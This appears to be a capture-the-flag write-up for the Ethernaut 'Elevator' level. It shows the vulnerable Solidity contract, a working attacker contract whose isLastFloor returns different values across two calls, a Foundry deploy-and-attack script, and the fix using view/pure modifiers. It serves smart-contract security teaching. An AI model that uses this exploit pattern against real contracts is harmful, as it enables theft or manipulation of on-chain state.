Level 11 - Elevator ⏺⏺

The EthernautOpenZeppelin

Level Setup

This elevator won't let you reach the top of your building. Right?

Things that might help:

Sometimes solidity is not good at keeping promises.
This Elevator expects to be used from a Building.

Level Contract

ethernaut/contracts/src/levels/Elevator.sol at a89c8f7832258655c09fde16e6602c78e5e99dbd · OpenZeppelin/ethernautGitHub

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

interface Building {
    function isLastFloor(uint256) external returns (bool);
}

contract Elevator {
    bool public top;
    uint256 public floor;

    function goTo(uint256 _floor) public {
        Building building = Building(msg.sender);

        if (!building.isLastFloor(_floor)) {
            floor = _floor;
            top = building.isLastFloor(floor);
        }
    }
}

Exploit

top must first return false when called, then true the next time. The interface for Building is set to msg.sender.

Create a contract that exploits this by implementing a function isLastFloor that sets top to true.

make anvil-exploit-level-11

<INPUT_LEVEL_INSTANCE_CONTRACT_ADDRESS>

make holesky-exploit-level-11

<INPUT_LEVEL_INSTANCE_CONTRACT_ADDRESS>

ethernaut-foundry/src/Level11.sol at main · EridianAlpha/ethernaut-foundryGitHub

src/Level1.sol

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

import {Script, console} from "forge-std/Script.sol";

// ================================================================
// │                        LEVEL 11 - ELEVATOR                   │
// ================================================================
interface IElevator {
    function goTo(uint256 _floor) external;
}

contract Building {
    IElevator targetContract;
    bool public last = true;

    constructor(address _targetContractAddress) payable {
        targetContract = IElevator(_targetContractAddress);
    }

    function isLastFloor(uint256 _floor) public returns (bool) {
        if (_floor > 0) {
            last = !last;
            return last;
        } else {
            revert("Invalid floor");
        }
    }

    function attack() public {
        targetContract.goTo(1);
    }
}

ethernaut-foundry/script/Level11.s.sol at main · EridianAlpha/ethernaut-foundryGitHub

script/Level11.s.sol

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

import {Script, console} from "forge-std/Script.sol";
import {HelperFunctions} from "script/HelperFunctions.s.sol";
import {Building} from "../src/Level11.sol";

// ================================================================
// │                        LEVEL 11 - ELEVATOR                   │
// ================================================================
contract Exploit is Script, HelperFunctions {
    function run() public {
        address targetContractAddress = getInstanceAddress();

        vm.startBroadcast();
        Building building = new Building(targetContractAddress);
        building.attack();
        vm.stopBroadcast();
    }
}

Submit instance... 🥳

Completion Message

You can use the view function modifier on an interface in order to prevent state modifications. The pure modifier also prevents functions from modifying the state. Make sure you read Solidity's documentation and learn its caveats.

An alternative way to solve this level is to build a view function which returns different results depends on input data but don't modify state, e.g. gasleft().

Notes

The function isLastFloor is called twice, with the returned value changing for the same input as the state is changed.
If the isLastFloor had been restricted to view, then this attack wouldn't be possible (unless it was calling a library, which doesn't have runtime checks to make sure it doesn't modify the state when it says it's view)

ethernaut-openzeppelin-hacks/level_11_Building.md at e936301859334383d568a614084917100319205e · nvnx7/ethernaut-openzeppelin-hacksGitHub

Last updated 9 months ago